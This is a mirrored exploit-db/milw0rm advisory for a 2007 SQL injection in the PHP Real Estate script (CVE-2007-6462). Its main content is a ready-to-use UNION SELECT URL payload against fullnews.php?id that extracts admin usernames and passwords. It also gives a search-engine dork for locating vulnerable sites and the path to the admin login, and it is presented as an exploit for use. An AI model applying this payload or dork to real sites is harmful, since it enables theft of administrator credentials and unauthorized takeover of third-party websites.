Lucene search
T0pP8uZzEDB-ID:4737HistoryDec 14, 2007 - 12:00 a.m.
PHP Real Estate - 'fullnews.php?id' SQL Injection
2007-12-1400:00:00
t0pP8uZz
www.exploit-db.com
34
AI Score
7.4
Confidence
Low
--==+================================================================================+==--
--==+ PHP Real Estate SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://phprealestatescript.com
DORK: "Browse with Interactive Map"
DESCRIPTION:
pull admin info from database
EXPLOITS:
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
NOTE/TIP:
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org !
--==+================================================================================+==--
--==+ PHP Real Estate SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2007-12-14]Related
nvd
nvd
CVE-2007-6462
2007-12-20 00:46:00
prion
prion
Sql injection
2007-12-20 00:46:00
cvelist
cvelist
CVE-2007-6462
2007-12-20 00:00:00
cve
cve
CVE-2007-6462
2007-12-20 00:46:00